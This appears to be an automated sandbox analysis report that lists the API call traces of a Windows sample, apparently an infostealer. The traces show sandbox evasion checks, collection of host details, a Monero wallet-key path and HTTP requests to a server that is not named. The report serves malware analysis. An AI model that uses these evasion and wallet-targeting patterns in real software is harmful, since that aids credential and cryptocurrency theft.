                                • GetProcAddress.KERNEL32(763B0000,012DCE20), ref: 0050A25D
                                • GetProcAddress.KERNEL32(763B0000,012DCF70), ref: 0050A275
                                • GetProcAddress.KERNEL32(763B0000,012C64A0), ref: 0050A28D
                                • GetProcAddress.KERNEL32(750F0000,012CB0E0), ref: 0050A2B3
                                • GetProcAddress.KERNEL32(750F0000,012CB2C0), ref: 0050A2CB
                                • GetProcAddress.KERNEL32(750F0000,012DCFA0), ref: 0050A2E3
                                • GetProcAddress.KERNEL32(750F0000,012C65E0), ref: 0050A2FC
                                • GetProcAddress.KERNEL32(750F0000,012C6300), ref: 0050A314
                                • GetProcAddress.KERNEL32(750F0000,012CAFC8), ref: 0050A32C
                                • GetProcAddress.KERNEL32(75A50000,012DCE38), ref: 0050A352
                                • GetProcAddress.KERNEL32(75A50000,012C6380), ref: 0050A36A
                                • GetProcAddress.KERNEL32(75A50000,012D88F0), ref: 0050A382
                                • GetProcAddress.KERNEL32(75A50000,012DCE68), ref: 0050A39B
                                • GetProcAddress.KERNEL32(75A50000,012DCE80), ref: 0050A3B3
                                • GetProcAddress.KERNEL32(75A50000,012C64E0), ref: 0050A3CB
                                • GetProcAddress.KERNEL32(75A50000,012C63C0), ref: 0050A3E4
                                • GetProcAddress.KERNEL32(75A50000,012DCE98), ref: 0050A3FC
                                • GetProcAddress.KERNEL32(75A50000,012DCEB0), ref: 0050A414
                                • GetProcAddress.KERNEL32(75070000,012C63A0), ref: 0050A436
                                • GetProcAddress.KERNEL32(75070000,012DCF88), ref: 0050A44E
                                • GetProcAddress.KERNEL32(75070000,012DCEE0), ref: 0050A466
                                • GetProcAddress.KERNEL32(75070000,012DCF28), ref: 0050A47F
                                • GetProcAddress.KERNEL32(75070000,012DCF58), ref: 0050A497
                                • GetProcAddress.KERNEL32(74E50000,012C6480), ref: 0050A4B8
                                • GetProcAddress.KERNEL32(74E50000,012C6440), ref: 0050A4D1
                                • GetProcAddress.KERNEL32(75320000,012C62C0), ref: 0050A4F2
                                • GetProcAddress.KERNEL32(75320000,012DC898), ref: 0050A50A
                                • GetProcAddress.KERNEL32(6F060000,012C6660), ref: 0050A530
                                • GetProcAddress.KERNEL32(6F060000,012C62A0), ref: 0050A548
                                • GetProcAddress.KERNEL32(6F060000,012C65A0), ref: 0050A560
                                • GetProcAddress.KERNEL32(6F060000,012DC9B8), ref: 0050A579
                                • GetProcAddress.KERNEL32(6F060000,012C63E0), ref: 0050A591
                                • GetProcAddress.KERNEL32(6F060000,012C6320), ref: 0050A5A9
                                • GetProcAddress.KERNEL32(6F060000,012C6400), ref: 0050A5C2
                                • GetProcAddress.KERNEL32(6F060000,012C6340), ref: 0050A5DA
                                • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0050A5F1
                                • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0050A607
                                • GetProcAddress.KERNEL32(74E00000,012DCA60), ref: 0050A629
                                • GetProcAddress.KERNEL32(74E00000,012D8820), ref: 0050A641
                                • GetProcAddress.KERNEL32(74E00000,012DC9D0), ref: 0050A659
                                • GetProcAddress.KERNEL32(74E00000,012DCA78), ref: 0050A672
                                • GetProcAddress.KERNEL32(74DF0000,012C6520), ref: 0050A693
                                • GetProcAddress.KERNEL32(6F9C0000,012DC8B0), ref: 0050A6B4
                                • GetProcAddress.KERNEL32(6F9C0000,012C6540), ref: 0050A6CD
                                • GetProcAddress.KERNEL32(6F9C0000,012DC970), ref: 0050A6E5
                                • GetProcAddress.KERNEL32(6F9C0000,012DC910), ref: 0050A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 95c4bca672dd090e52cd2ae6c4337acf74c53222e58ee9c13e7114b194b357f9
                                • Instruction ID: 862f8ab37906f55ad20dd5cbe0a66f0dbbff19d00526dceb639678de52170230
                                • Opcode Fuzzy Hash: 95c4bca672dd090e52cd2ae6c4337acf74c53222e58ee9c13e7114b194b357f9
                                • Instruction Fuzzy Hash: ED624CB6504240BFE345DFA8ED8AD963BF9F7AC303304C51AA689C3264D73D9841CB5A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                (Control-flow graph of the function at 0x004F6280, rendered as an image in the original report; its basic blocks are annotated with the WinINet calls InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile and InternetCloseHandle, plus StrCmpCA, as listed under APIs below.)
                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004F4839
                                  • Part of subcall function 004F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • InternetOpenA.WININET(00510DFE,00000001,00000000,00000000,00000000), ref: 004F62E1
                                • StrCmpCA.SHLWAPI(?,012DE250), ref: 004F6303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F6335
                                • HttpOpenRequestA.WININET(00000000,GET,?,012DDC38,00000000,00000000,00400100,00000000), ref: 004F6385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004F63BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004F63D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004F63FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004F646D
                                • InternetCloseHandle.WININET(00000000), ref: 004F64EF
                                • InternetCloseHandle.WININET(00000000), ref: 004F64F9
                                • InternetCloseHandle.WININET(00000000), ref: 004F6503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 6695fc1e6845eae1fb9139fdb9ab94c14fddb1f7b81736669a2bb3ed63438884
                                • Instruction ID: 913bc391f7d657f29c8fbcf4092592b9c18dcc34fe95c3198c33b247c182bb02
                                • Opcode Fuzzy Hash: 6695fc1e6845eae1fb9139fdb9ab94c14fddb1f7b81736669a2bb3ed63438884
                                • Instruction Fuzzy Hash: 8F710D71A00318ABEB14EBA0DC49FEE7B74FB44701F108199F6096B1D4DBB86A85CF56

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                (Control-flow graph of the function at 0x00505510, rendered as an image in the original report; its basic blocks are annotated with repeated StrCmpCA calls and a Sleep call, as listed under APIs below.)
                                APIs
                                  • Part of subcall function 0050A820: lstrlen.KERNEL32(004F4F05,?,?,004F4F05,00510DDE), ref: 0050A82B
                                  • Part of subcall function 0050A820: lstrcpy.KERNEL32(00510DDE,00000000), ref: 0050A885
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00505644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005056A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00505857
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 005051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00505228
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 005052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00505318
                                  • Part of subcall function 005052C0: lstrlen.KERNEL32(00000000), ref: 0050532F
                                  • Part of subcall function 005052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00505364
                                  • Part of subcall function 005052C0: lstrlen.KERNEL32(00000000), ref: 00505383
                                  • Part of subcall function 005052C0: lstrlen.KERNEL32(00000000), ref: 005053AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0050578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00505940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00505A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00505A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 187248dfb83099d609c75f14392d84e44d29ff0105a220e25fbfc07d90ba4a6b
                                • Instruction ID: 7ce86d997ee19ffd97faef897120b5e22879e92adfe578293352caf25902b2d3
                                • Opcode Fuzzy Hash: 187248dfb83099d609c75f14392d84e44d29ff0105a220e25fbfc07d90ba4a6b
                                • Instruction Fuzzy Hash: 14E12072910209AADB14FBB0DC5BEFE7B38BF94300F50C528B546560D5EF346A49CBA6

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                (Control-flow graph of the function at 0x005017A0, rendered as an image in the original report; its basic blocks are annotated with StrCmpCA and ExitProcess calls, as listed under APIs below.)
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 005017C5
                                • ExitProcess.KERNEL32 ref: 005017D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: b90774facba1cbc00fa8642de15ccf1417501ac584c0f9e51f0bed1bf0e7df6f
                                • Instruction ID: 9d9f370d51093ec3c90cff25165167cb9ad9eb7695cf1d9617de08ab00f4900b
                                • Opcode Fuzzy Hash: b90774facba1cbc00fa8642de15ccf1417501ac584c0f9e51f0bed1bf0e7df6f
                                • Instruction Fuzzy Hash: 83516DB4A04209EFDB04DFA4D959AFE7BB5BF44704F10884CE406A72C0D774E991CB6A

Control-flow Graph

control_flow_graph: function at 0x507500 (blocks 0x507500-0x50768e; GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap/RtlAllocateHeap, wsprintfA; rendered graph, executed/not-executed legend and edge listing omitted)
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00507542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0050757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0050760A
                                • wsprintfA.USER32 ref: 00507640
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$Q
                                • API String ID: 1544550907-2387536637
                                • Opcode ID: 0d62994f2d8ee73b0a6f53bda94dcb3f0f1ebe14ec8cbbf47e094e3ed5077d5b
                                • Instruction ID: 88d387510588a38fd9e9caf3a7035f5680ee7e7db761f0559b7e5672d92b8ee1
                                • Opcode Fuzzy Hash: 0d62994f2d8ee73b0a6f53bda94dcb3f0f1ebe14ec8cbbf47e094e3ed5077d5b
                                • Instruction Fuzzy Hash: F5418FB1D04248ABDB10DF94DC49BEEBBB8BB58700F104198F549672C0D7796A44CFA5

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0840), ref: 005098A1
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0690), ref: 005098BA
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0558), ref: 005098D2
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0678), ref: 005098EA
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0570), ref: 00509903
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D8930), ref: 0050991B
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012C6760), ref: 00509933
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012C6920), ref: 0050994C
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D05A0), ref: 00509964
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D05B8), ref: 0050997C
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D05E8), ref: 00509995
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0618), ref: 005099AD
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012C6980), ref: 005099C5
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D06F0), ref: 005099DE
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 004F11D0: ExitProcess.KERNEL32 ref: 004F1211
                                  • Part of subcall function 004F1160: GetSystemInfo.KERNEL32(?), ref: 004F116A
                                  • Part of subcall function 004F1160: ExitProcess.KERNEL32 ref: 004F117E
                                  • Part of subcall function 004F1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004F112B
                                  • Part of subcall function 004F1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 004F1132
                                  • Part of subcall function 004F1110: ExitProcess.KERNEL32 ref: 004F1143
                                  • Part of subcall function 004F1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004F123E
                                  • Part of subcall function 004F1220: __aulldiv.LIBCMT ref: 004F1258
                                  • Part of subcall function 004F1220: __aulldiv.LIBCMT ref: 004F1266
                                  • Part of subcall function 004F1220: ExitProcess.KERNEL32 ref: 004F1294
                                  • Part of subcall function 00506770: GetUserDefaultLangID.KERNEL32 ref: 00506774
                                  • Part of subcall function 004F1190: ExitProcess.KERNEL32 ref: 004F11C6
                                  • Part of subcall function 00507850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004F11B7), ref: 00507880
                                  • Part of subcall function 00507850: RtlAllocateHeap.NTDLL(00000000), ref: 00507887
                                  • Part of subcall function 00507850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0050789F
                                  • Part of subcall function 005078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507910
                                  • Part of subcall function 005078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00507917
                                  • Part of subcall function 005078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0050792F
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012D89D0,?,0051110C,?,00000000,?,00511110,?,00000000,00510AEF), ref: 00506ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00506AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00506AF9
                                • Sleep.KERNEL32(00001770), ref: 00506B04
                                • CloseHandle.KERNEL32(?,00000000,?,012D89D0,?,0051110C,?,00000000,?,00511110,?,00000000,00510AEF), ref: 00506B1A
                                • ExitProcess.KERNEL32 ref: 00506B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: ee80f2208b03739e02a288ae3314992172d236cf40cef771b8701c986c509e71
                                • Instruction ID: 1fa217eda0621cc3f53785a3ebf932c32f3ff0f9d20ab94414674a19ba3a1fd2
                                • Opcode Fuzzy Hash: ee80f2208b03739e02a288ae3314992172d236cf40cef771b8701c986c509e71
                                • Instruction Fuzzy Hash: F9310F71A0020AAAEB04F7F0DD5BBEE7B78BF84341F108519F202A21D2DF746945C6A6

Control-flow Graph

control_flow_graph: function at 0x4f1220 (blocks 0x4f1220-0x4f129d; GlobalMemoryStatusEx followed by two __aulldiv calls and a conditional ExitProcess; rendered graph, executed/not-executed legend and edge listing omitted)
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004F123E
                                • __aulldiv.LIBCMT ref: 004F1258
                                • __aulldiv.LIBCMT ref: 004F1266
                                • ExitProcess.KERNEL32 ref: 004F1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: 84c129129f96ca70b58e68ebe25f3115299c7ef09a1844545f6e8eded6c3b661
                                • Instruction ID: e809631bca154c5b5e6eeb54bf729fd39a86b9704a6984342ba78b6250920583
                                • Opcode Fuzzy Hash: 84c129129f96ca70b58e68ebe25f3115299c7ef09a1844545f6e8eded6c3b661
                                • Instruction Fuzzy Hash: E0016DB0D4030CFAEB10EBE0DC4ABAEBB78BB44701F208089E705B62D0D7785541879D

Control-flow Graph

control_flow_graph: function covering 0x506aba-0x506b22 (OpenEventA/CreateEventA loop with CloseHandle and Sleep, ending in ExitProcess; rendered graph, executed/not-executed legend and edge listing omitted)
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012D89D0,?,0051110C,?,00000000,?,00511110,?,00000000,00510AEF), ref: 00506ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00506AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00506AF9
                                • Sleep.KERNEL32(00001770), ref: 00506B04
                                • CloseHandle.KERNEL32(?,00000000,?,012D89D0,?,0051110C,?,00000000,?,00511110,?,00000000,00510AEF), ref: 00506B1A
                                • ExitProcess.KERNEL32 ref: 00506B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 4d58ffee3fe1c3e7f126d292f4c632a6731e63b6ce96c40ceed5b5eae3ffa718
                                • Instruction ID: e2916f1069415f7480376c5c44dfd07d318b6152d184546436cb40feb76be120
                                • Opcode Fuzzy Hash: 4d58ffee3fe1c3e7f126d292f4c632a6731e63b6ce96c40ceed5b5eae3ffa718
                                • Instruction Fuzzy Hash: 59F03470A4020AEAF700ABA09C0BBBE7E34FB04702F108914B503A11D1DBB45540DAAA

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004F4839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: f93c1a0c2aaeafb29a29855b18071a849b6eff811b187f6edd233a9cc912e9b4
                                • Instruction ID: aa0bf04278d5a7955b8e4ffd79a32601aa7d2d8b352fdfef0503187b7b3045f3
                                • Opcode Fuzzy Hash: f93c1a0c2aaeafb29a29855b18071a849b6eff811b187f6edd233a9cc912e9b4
                                • Instruction Fuzzy Hash: B2213EB1D00209ABDF14DFA5EC4AADE7B74FB44320F108625F955A72D1EB706A09CB91

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F6280: InternetOpenA.WININET(00510DFE,00000001,00000000,00000000,00000000), ref: 004F62E1
                                  • Part of subcall function 004F6280: StrCmpCA.SHLWAPI(?,012DE250), ref: 004F6303
                                  • Part of subcall function 004F6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F6335
                                  • Part of subcall function 004F6280: HttpOpenRequestA.WININET(00000000,GET,?,012DDC38,00000000,00000000,00400100,00000000), ref: 004F6385
                                  • Part of subcall function 004F6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004F63BF
                                  • Part of subcall function 004F6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004F63D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00505228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 829063a38f6a3848b91cc6ed10dc7005532df1d4034b5c915f4f3dc6591f9806
                                • Instruction ID: 28d0dd082fb96949026ace9d7d076ccf913e77d0db286a5252dd52a32ebb777d
                                • Opcode Fuzzy Hash: 829063a38f6a3848b91cc6ed10dc7005532df1d4034b5c915f4f3dc6591f9806
                                • Instruction Fuzzy Hash: 31112E30900249ABDB14FF70DD5AEED7B38BF90300F408558F90A4A1D2EF34AB09CA95
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00507917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 0050792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 69b3a9561e2222d9cdbcb58911bf5c86a4e5328e1026a635a4087bddd3df72fc
                                • Instruction ID: 12c8a68c293b157a6b8ecf6c7754a84d766e196c6d41b3334d5f959497b773b7
                                • Opcode Fuzzy Hash: 69b3a9561e2222d9cdbcb58911bf5c86a4e5328e1026a635a4087bddd3df72fc
                                • Instruction Fuzzy Hash: A30186B1904208EBDB00DF98DD45BAEBFB8FB04B21F104619F945E32C0C37859048BA5
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004F112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 004F1132
                                • ExitProcess.KERNEL32 ref: 004F1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: d523352d7063a808f6b159639b9557dfea7013bb49330a79673e3c08426fec0e
                                • Instruction ID: 8a8f86659e2988b36491f663ea650cb5fa4d3bde1c7620b88e79519c8c348cb3
                                • Opcode Fuzzy Hash: d523352d7063a808f6b159639b9557dfea7013bb49330a79673e3c08426fec0e
                                • Instruction Fuzzy Hash: 6AE0E67094534CFFF7106BA1DD0FB5976B8AB04B06F104055F709765D0D6B92640969E
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004F10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004F10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
